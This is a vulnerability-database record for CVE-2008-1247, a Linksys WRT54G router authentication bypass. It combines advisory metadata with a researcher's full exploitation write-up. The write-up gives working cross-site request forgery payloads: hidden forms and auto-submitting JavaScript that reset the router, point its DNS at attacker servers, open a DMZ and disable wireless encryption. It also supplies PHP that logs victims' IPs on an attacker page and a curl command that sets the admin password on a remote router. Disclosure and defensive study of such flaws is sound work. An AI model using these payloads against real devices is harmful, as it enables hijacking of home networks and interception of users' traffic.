ID

VAR-200803-0170


CVE

CVE-2008-1247


TITLE

Linksys WRT54g On the router Web Vulnerability to execute arbitrary administrator operations in the interface

Trust: 0.8

sources: JVNDB: JVNDB-2008-004203

DESCRIPTION

The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. The problem is CVE-2006-5202 And may overlap.A third party may perform any administrator action through the following direct requests: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. Successful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. The issues affect firmware v1.00.9; other versions may also be vulnerable. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Linksys WRT54G Security Bypass Vulnerability SECUNIA ADVISORY ID: SA29344 VERIFY ADVISORY: http://secunia.com/advisories/29344/ CRITICAL: Less critical IMPACT: Security Bypass WHERE: >From local network OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/ DESCRIPTION: meathive has reported a vulnerability in Linksys WRT54G, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to improper authorization checks when performing administrative actions via the web interface. This can be exploited to perform restricted actions by directly accessing Basic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri, dmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri, vpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri, ping.tri, tracert.tri, or rstatus.tri. WRT54G v5/v6: Install version 1.02.5. WRT54G v8: Install version 8.00.5. WRT54G v8.2: Install version 8.2.05. PROVIDED AND/OR DISCOVERED BY: meathive ORIGINAL ADVISORY: http://kinqpinz.info/lib/wrt54g/own.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . __ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___ | l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \ | ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y | \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O | | Y | | | | || || | | | | | || / | __ | | | | || _] | | | . ++| Intro ---------------------- This text is in addition to the findings I have already made public regarding the Linksys WRT54G wireless router and firewall gateway device. The scripts that process configuration changes do not require authentication and therefore can be altered _remotely_ via simple form submissions written in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous findings and the demo page with sample exploits. ++| Let's Get Dirty ---------------------- You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows how forms can be constructed in HTML that take advantage of the major flaws present within the insecure router. In my previous documentation I showed how it is possible to alter configuration parameters both via Linux command line using curl and HTML form submissions. In this text I demonstrate how to do these very same things transparently using a combination of HTML form construction with JavaScript that automagically submits our desired changes. The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all that is required in order to submit our form that will be constructed using GET parameters observed from the device's Web interface. document.f.submit(); This submits forms hidden within the Webpage. Our first example code enables wireless access with an SSID of our choosing. In this instance, I will use the SSID "kinqpinz". <form name="f" action="http://192.168.1.1/WBasic.tri" method="POST"> <input type="hidden" name="submit_type" value=""> <input type="hidden" name="channelno" value="11"> <input type="hidden" name="OldWirelessMode" value="3"> <input type="hidden" name="Mode" value="3"> <input type="hidden" name="SSID" value="kinqpinz"> <input type="hidden" name="channel" value="6"> <input type="hidden" name="Freq" value="6"> <input type="hidden" name="wl_closed" value="1"> <input type="hidden" name="sesMode" value="1"> <input type="hidden" name="layout" value="en"> </form> The reason this works is simple: configuration parameters are constructed in the URL in the Web interface, hosted by default at the address http://192.168.1.1. One can view these parameters while configuring their device. The code above simply constructs a URL that is processed by the router's IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser: http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en It's simple enough to understand what's going on. Each variable passed in the URL describes exactly what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part to exploiting the router is the fact that you cannot alter settings using a URL like the one above. That would result in a GET request on behalf of the device, whereas we're interested in POST requests that actually trigger configuration changes. A GET request does nothing. Below I describe a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, and a touch of PHP to grab the mark's external IP. ++| Remote Real World Attack Scenario ---------------------- So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It has made a few assumptions about your environment, however. One major assumption is that you've kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes you've made to the router in terms of security, e.g., strong password, wireless encryption, access restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do NOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so that you do not fall victim to a malicious individual hosting code that will be presented in this text. ++| Remote Real World Attack Scenario Requirements ---------------------- On http://www.hacker.tld a page is hosted that contains the following: (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; (2) JavaScript that submits these forms transparently; (3) PHP or similar server-side code that acquires the mark's external IP address as they browse the page; and, (4) PHP or similar server-side code that retains the mark's external IP address in the event that the remote form submission is successful, thus allowing the remote attacker to further exploit the device. http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP is used - though any server-side language is suitable - for obtaining the external IP of any individual viewing the exploit page and writes this information to a log file. <?php $ip=$_SERVER['REMOTE_ADDR']; $toWrite="Potential mark resides at $ip\n\n"; $f=fopen("mark.txt", "a+"); fwrite($f, $toWrite); fclose($f); ?> The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute and submitting the form. <script type="text/javascript"> document.f.submit(); </script> All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the HTML form's 'hidden' attribute. <form name="f" action="http://192.168.1.1/WBasic.tri" method="POST"> <input type="hidden" name="submit_type" value=""> <input type="hidden" name="channelno" value="11"> <input type="hidden" name="OldWirelessMode" value="3"> <input type="hidden" name="Mode" value="3"> <input type="hidden" name="SSID" value="kinqpinz"> <input type="hidden" name="channel" value="6"> <input type="hidden" name="Freq" value="6"> <input type="hidden" name="wl_closed" value="1"> <input type="hidden" name="sesMode" value="1"> <input type="hidden" name="layout" value="en"> </form> What you should observe from this is the form name of "f" which is used in the JS to submit the form as well as the various 'name' and 'value' attributes that are used to create a URL such as this: submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en Do note that without any one of these parameters, the exploit fails and nothing changes. All of the elements must remain in place even if they do not directly make sense. They are simply options that the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case matters and do not forget that the request must be POST, not GET. Also different config changes require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. Now that the malicious page has been composed and sits online living and waiting for marks at http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom PHP logging script. In mark.txt, our logging file, sample output would resemble something like the following. Potential mark resides at 1.1.1.1 Potential mark resides at 2.2.2.2 Potential mark resides at 3.3.3.3 So forth... They are potential marks because it is unknown whether or not they are using the WRT54G with a supported firmware version that is exploitable using these techniques, and/or the exploit attempt failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not using the default local address (good for them) that this attack relies on. When they browse the page, because we have set no timeout for this change to occur, they are instantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, does not inform the user if they were educated enough of what has just happened, so they may continue on doing whatever they were doing, more often than not unaware of what has just happened. At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at our leisure and further test the remote host whether or not they are vulnerable to attack. At the very least, we may decide to completely reset the router to rest assured we know its current state to make further compromise a snap, such as altering the device's DNS records for sniffing traffic. This is quite feasible, here's how. <form method="post" action="http://192.168.1.1/factdefa.tri"> <input type="hidden" name="FactoryDefaults" value="Yes"> <input type="hidden" name="layout" value="en"> <input type="submit"> </form> This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs all incoming and outgoing requests before passing them on to the next in line. <form method="post" action="http://192.168.1.1/Basic.tri"> <input type="hidden" name="dhcp_end" value="149"> <input type="hidden" name="oldMtu" value="1500"> <input type="hidden" name="oldLanSubnet" value="0"> <input type="hidden" name="OldWanMode" value="0"> <input type="hidden" name="SDHCP1" value="192"> <input type="hidden" name="SDHCP2" value="168"> <input type="hidden" name="SDHCP3" value="1"> <input type="hidden" name="SDHCP4" value="100"> <input type="hidden" name="EDHCP1" value="192"> <input type="hidden" name="EDHCP2" value="168"> <input type="hidden" name="EDHCP3" value="1"> <input type="hidden" name="EDHCP4" value="150"> <input type="hidden" name="pd" value=""> <input type="hidden" name="now_proto" value="dhcp"> <input type="hidden" name="old_domain" value=""> <input type="hidden" name="chg_lanip" value="192.168.1.1"> <input type="hidden" name="_daylight_time" value="1"> <input type="hidden" name="wan_proto" value="0"> <input type="hidden" name="router_name" value="WRT54G"> <input type="hidden" name="wan_hostname" value=""> <input type="hidden" name="wan_domain" value=""> <input type="hidden" name="mtu_enable" value="0"> <input type="hidden" name="lan_ipaddr_0" value="192"> <input type="hidden" name="lan_ipaddr_1" value="168"> <input type="hidden" name="lan_ipaddr_2" value="1"> <input type="hidden" name="lan_ipaddr_3" value="1"> <input type="hidden" name="lan_netmask" value="0"> <input type="hidden" name="lan_proto" value="Enable"> <input type="hidden" name="dhcp_start" value="100"> <input type="hidden" name="dhcp_num" value="50"> <input type="hidden" name="dhcp_lease" value="0"> <input type="hidden" name="dns0_0" value="1"> <input type="hidden" name="dns0_1" value="2"> <input type="hidden" name="dns0_2" value="3"> <input type="hidden" name="dns0_3" value="4"> <input type="hidden" name="dns1_0" value="5"> <input type="hidden" name="dns1_1" value="6"> <input type="hidden" name="dns1_2" value="7"> <input type="hidden" name="dns1_3" value="8"> <input type="hidden" name="dns2_0" value="9"> <input type="hidden" name="dns2_1" value="8"> <input type="hidden" name="dns2_2" value="7"> <input type="hidden" name="dns2_3" value="6"> <input type="hidden" name="wins_0" value="0"> <input type="hidden" name="wins_1" value="0"> <input type="hidden" name="wins_2" value="0"> <input type="hidden" name="wins_3" value="0"> <input type="hidden" name="time_zone" value="%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29"> <input type="hidden" name="daylight_time" value="ON"> <input type="hidden" name="layout" value="en"> <input type="submit"> </form> This is indeed convoluted but all of these values must be in place in order to be successful. What is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the following URL that is submitted to http://192.168.1.1/Basic.tri. http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en ++| An Alternative (with JavaScript) ---------------------- This is the basic exploitation method of the router although the attacker has many alternatives of submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. A few alternative methods would include using a JavaScript onClick function within a standard looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.: <a href="/path/" onClick="xhrRequest();">This looks innocent enough.</a> ...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this standard looking navigation link, e.g.: var xhr=false; if(window.XMLHttpRequest) { xhr=new XMLHttpRequest(); } else if(window.ActiveXObject) { xhr=new ActiveXObject("Microsoft.XMLHTTP"); } function xhrRequest() { if(xhr) { xhr.open("POST", "http://192.168.1.1/Security.tri", true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange=function() { if(xhr.readyState == 4 && xhr.status == 200) { var success=xhr.responseText; } } xhr.send("SecurityMode=0&layout=en"); } } The example above effectively disables all wireless encryption so that if you happen to live close enough to this poor individual, it is your duty to pwn their wireless by enabling open access for everybody in the neighborhood! Here's the URL for disabling wireless encryption: http://192.168.1.1/Security.tri?SecurityMode=0&layout=en ++| An Alternative (without JavaScript) ---------------------- You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent looking methods of compromising your WRT54G. For example, user registration for a bulletin board or forum system. The site must acquire a minimal amount of information in order to create the account so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the URL once again: http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en Again it is a different script processing the request on behalf of the router's internal operating system, dmz.tri, but it still does not require authentication prior to changing the settings we wish to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.: <form method="post" action="http://192.168.1.1/dmz.tri"> <input type="hidden" name="action" value="Apply"> <input type="hidden" name="dmz_enable" value="1"> <input type="hidden" name="dmz_ipaddr" value="100"> <input type="hidden" name="layout" value="en"> ...and add these values to their user registration page with standard username/password/e-mail fields... Username: <input type="text" name="username"><br> Password: <input type="password" name="password1"><br> Confirm Password: <input type="password" name="password2"><br> <input type="submit"> </form> ...that can be found on traditional forums these days. The mark submits and exploits his/her own router although they believe they are at least minimally technically savvy by using a combination of technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms we use to store the router configs are hidden, and the normal user registration forms are not, thus it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has detected that a potential attack is taking place it is likely too late as the mastermind behind http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration changes within 10 seconds, which is plenty of time for them to open another terminal and change the administrative login to block our mark from changing their settings, e.g.: curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http://<REMOTE_EXTERNAL_ADDR>/manage.tri Here the hacker can now log in as admin with password 'pwn' with complete freedom to _REMOTELY_ monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more. ++| Conclusion ---------------------- It is my intention in finalizing this document that the reader understands that the Linksys WRT54G firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care whether or not you have the level of privilege thought to be necessary for manipulating sensitive objects. Thanks go to hw2B for suggesting I write all of this garbage out. ++| URLs ---------------------- https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) https://kinqpinz.info/lib/wrt54g/own2.txt (this document) http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)

Trust: 2.16

sources: NVD: CVE-2008-1247 // JVNDB: JVNDB-2008-004203 // BID: 28381 // VULHUB: VHN-31372 // PACKETSTORM: 64785 // PACKETSTORM: 67644

AFFECTED PRODUCTS

vendor:linksysmodel:wrt54gscope:eqversion:*

Trust: 1.0

vendor:cisco linksysmodel:wrt54gscope:eqversion:1.00.9

Trust: 0.8

vendor:linksysmodel:wrt54gscope:eqversion:1.00.9

Trust: 0.6

vendor:linksysmodel:wrt54gscope:eqversion:v1.01.0.9

Trust: 0.3

sources: BID: 28381 // JVNDB: JVNDB-2008-004203 // CNNVD: CNNVD-200803-125 // NVD: CVE-2008-1247

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2008-1247
value: HIGH

Trust: 1.0

NVD: CVE-2008-1247
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200803-125
value: CRITICAL

Trust: 0.6

VULHUB: VHN-31372
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2008-1247
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-31372
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-31372 // JVNDB: JVNDB-2008-004203 // CNNVD: CNNVD-200803-125 // NVD: CVE-2008-1247

PROBLEMTYPE DATA

problemtype:CWE-264

Trust: 1.9

sources: VULHUB: VHN-31372 // JVNDB: JVNDB-2008-004203 // NVD: CVE-2008-1247

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200803-125

TYPE

permissions and access control

Trust: 0.6

sources: CNNVD: CNNVD-200803-125

CONFIGURATIONS

sources: JVNDB: JVNDB-2008-004203

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-31372

PATCH

title:Linksysurl:http://home.cisco.com/en-apac/home

Trust: 0.8

sources: JVNDB: JVNDB-2008-004203

EXTERNAL IDS

db:NVDid:CVE-2008-1247

Trust: 3.0

db:BIDid:28381

Trust: 2.0

db:SECUNIAid:29344

Trust: 1.8

db:EXPLOIT-DBid:5926

Trust: 1.7

db:EXPLOIT-DBid:5313

Trust: 1.7

db:JVNDBid:JVNDB-2008-004203

Trust: 0.8

db:CNNVDid:CNNVD-200803-125

Trust: 0.7

db:BUGTRAQid:20080301 THE ROUTER HACKING CHALLENGE IS OVER!

Trust: 0.6

db:MILW0RMid:5313

Trust: 0.6

db:MILW0RMid:5926

Trust: 0.6

db:XFid:54

Trust: 0.6

db:XFid:41118

Trust: 0.6

db:MISCid:HTTP://KINQPINZ.INFO/LIB/WRT54G/OWN.TXT

Trust: 0.6

db:PACKETSTORMid:67644

Trust: 0.2

db:PACKETSTORMid:64904

Trust: 0.2

db:SEEBUGid:SSVID-65280

Trust: 0.1

db:SEEBUGid:SSVID-8833

Trust: 0.1

db:VULHUBid:VHN-31372

Trust: 0.1

db:PACKETSTORMid:64785

Trust: 0.1

sources: VULHUB: VHN-31372 // BID: 28381 // JVNDB: JVNDB-2008-004203 // PACKETSTORM: 64904 // PACKETSTORM: 64785 // PACKETSTORM: 67644 // CNNVD: CNNVD-200803-125 // NVD: CVE-2008-1247

REFERENCES

url:http://kinqpinz.info/lib/wrt54g/own.txt

Trust: 1.9

url:https://kinqpinz.info/lib/wrt54g/

Trust: 1.9

url:https://kinqpinz.info/lib/wrt54g/own2.txt

Trust: 1.8

url:http://www.securityfocus.com/bid/28381

Trust: 1.7

url:http://www.gnucitizen.org/projects/router-hacking-challenge/

Trust: 1.7

url:http://secunia.com/advisories/29344

Trust: 1.7

url:http://www.securityfocus.com/archive/1/489009/100/0/threaded

Trust: 1.1

url:https://www.exploit-db.com/exploits/5313

Trust: 1.1

url:https://www.exploit-db.com/exploits/5926

Trust: 1.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/41118

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1247

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1247

Trust: 0.8

url:http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded

Trust: 0.6

url:http://www.milw0rm.com/exploits/5926

Trust: 0.6

url:http://xforce.iss.net/xforce/xfdb/41118

Trust: 0.6

url:http://www.milw0rm.com/exploits/5313

Trust: 0.6

url:http://www.linksys.com

Trust: 0.3

url:http://192.168.1.1/security.tri?securitymode=0&layout=en

Trust: 0.2

url:https://nvd.nist.gov/vuln/detail/cve-2008-1247

Trust: 0.2

url:http://192.168.1.1/factdefa.tri?factorydefaults=yes&layout=en

Trust: 0.2

url:http://192.168.1.1/basic.tri?dhcp_end=149&oldmtu=1500&oldlansubnet=0&oldwanmode=0&sdhcp1=192&sdhcp2=168&sdhcp3=1&sdhcp4=100&edhcp1=192&edhcp2=168&edhcp3=1&edhcp4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=wrt54g&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29&daylight_time=on&layout=en

Trust: 0.2

url:http://192.168.1.1/dmz.tri?action=apply&dmz_enable=1&dmz_ipaddr=100&layout=en

Trust: 0.2

url:http://192.168.1.1/factdefa.tri">

Trust: 0.2

url:http://192.168.1.1/basic.tri">

Trust: 0.2

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-1247

Trust: 0.2

url:http://192.168.1.1/dmz.tri">

Trust: 0.2

url:http://www.intoto.com/company.shtml.

Trust: 0.1

url:http://192.168.1.1/wfilter.tri

Trust: 0.1

url:http://192.168.1.1/ctlog.tri">

Trust: 0.1

url:http://192.168.1.1/manage.tri">

Trust: 0.1

url:http://192.168.1.1/wfilter.tri?wl_macmode1=0

Trust: 0.1

url:http://192.168.1.1/wbasic.tri

Trust: 0.1

url:http://192.168.1.1/wbasic.tri">

Trust: 0.1

url:http://192.168.1.1/vpn.tri">

Trust: 0.1

url:https://kinqpinz.info/lib/wrt54g/,

Trust: 0.1

url:http://192.168.1.1/manage.tri?remote_mgt_https=0&http_enable=1&https_enable=0&passwdmodify=1&http_passwd=asdf&http_passwdconfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en

Trust: 0.1

url:http://192.168.1.1/dmz.tri?action=apply&dmz_enable=0&layout=en

Trust: 0.1

url:http://192.168.1.1/tracert.tri">

Trust: 0.1

url:http://192.168.1.1/config.bin">

Trust: 0.1

url:http://192.168.1.1/manage.tri

Trust: 0.1

url:http://192.168.1.1/config.bin.

Trust: 0.1

url:http://192.168.1.1/manage.tri?remote_mgt_https=0&http_enable=1&https_enable=0&passwdmodify=1&http_passwd=asdf&http_passwdconfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=1&http_wanport=31337&upnp_enable=1&layout=en

Trust: 0.1

url:http://192.168.1.1/factdefa.tri

Trust: 0.1

url:http://192.168.1.1/wfilter.tri">

Trust: 0.1

url:http://192.168.1.1/basic.tri

Trust: 0.1

url:http://192.168.1.1/rstatus.tri">

Trust: 0.1

url:http://192.168.1.1/wbasic.tri?submit_type=&channelno=11&oldwirelessmode=3&mode=3&ssid=pwnage&channel=6&freq=6&wl_closed=1&sesmode=1&layout=en

Trust: 0.1

url:http://192.168.1.1/ptrigger.tri">

Trust: 0.1

url:http://192.168.1.1/security.tri

Trust: 0.1

url:http://192.168.1.1/dmz.tri

Trust: 0.1

url:http://192.168.1.1/security.tri">

Trust: 0.1

url:http://192.168.1.1/ping.tri">

Trust: 0.1

url:http://192.168.1.1/basic.tri?dhcp_end=149&oldmtu=1500&oldlansubnet=0&oldwanmode=0&sdhcp1=192&sdhcp2=168&sdhcp3=1&sdhcp4=100&edhcp1=192&edhcp2=168&edhcp3=1&edhcp4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=wrt54g&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=0&dns0_1=0&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0&dns2_1=0&dns2_2=0&dns2_3=0&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29&daylight_time=on&layout=en

Trust: 0.1

url:http://192.168.1.1/portrange.tri">

Trust: 0.1

url:http://secunia.com/secunia_security_advisories/

Trust: 0.1

url:http://secunia.com/advisories/29344/

Trust: 0.1

url:https://psi.secunia.com/?page=changelog

Trust: 0.1

url:https://psi.secunia.com/

Trust: 0.1

url:http://secunia.com/product/3523/

Trust: 0.1

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.1

url:http://secunia.com/about_secunia_advisories/

Trust: 0.1

url:https://kinqpinz.info/

Trust: 0.1

url:http://www.hacker.tld/

Trust: 0.1

url:http://192.168.1.1/basic.tri.

Trust: 0.1

url:http://<remote_external_addr>/manage.tri

Trust: 0.1

url:http://192.168.1.1/wbasic.tri.

Trust: 0.1

url:http://192.168.1.1/wbasic.tri"

Trust: 0.1

url:http://192.168.1.1.

Trust: 0.1

url:https://kinqpinz.info/lib/wrt54g/.

Trust: 0.1

url:http://www.hacker.tld/index.php

Trust: 0.1

url:http://192.168.1.1/wbasic.tri?submit_type=&channelno=11&oldwirelessmode=3&mode=3&ssid=kinqpinz&channel=6&freq=6&wl_closed=1&sesmode=1&layout=en

Trust: 0.1

url:http://192.168.1.1/security.tri",

Trust: 0.1

url:http://www.hacker.tld/index.php,

Trust: 0.1

url:http://www.hacker.tld

Trust: 0.1

sources: VULHUB: VHN-31372 // BID: 28381 // JVNDB: JVNDB-2008-004203 // PACKETSTORM: 64904 // PACKETSTORM: 64785 // PACKETSTORM: 67644 // CNNVD: CNNVD-200803-125 // NVD: CVE-2008-1247

CREDITS

meathive

Trust: 0.8

sources: PACKETSTORM: 64904 // PACKETSTORM: 67644 // CNNVD: CNNVD-200803-125

SOURCES

db:VULHUBid:VHN-31372
db:BIDid:28381
db:JVNDBid:JVNDB-2008-004203
db:PACKETSTORMid:64904
db:PACKETSTORMid:64785
db:PACKETSTORMid:67644
db:CNNVDid:CNNVD-200803-125
db:NVDid:CVE-2008-1247

LAST UPDATE DATE

2025-04-10T20:49:24.427000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-31372date:2018-10-11T00:00:00
db:BIDid:28381date:2009-04-29T20:56:00
db:JVNDBid:JVNDB-2008-004203date:2012-09-25T00:00:00
db:CNNVDid:CNNVD-200803-125date:2008-09-11T00:00:00
db:NVDid:CVE-2008-1247date:2025-04-09T00:30:58.490

SOURCES RELEASE DATE

db:VULHUBid:VHN-31372date:2008-03-10T00:00:00
db:BIDid:28381date:2008-03-10T00:00:00
db:JVNDBid:JVNDB-2008-004203date:2012-09-25T00:00:00
db:PACKETSTORMid:64904date:2008-03-26T21:47:04
db:PACKETSTORMid:64785date:2008-03-21T21:12:32
db:PACKETSTORMid:67644date:2008-06-24T19:34:03
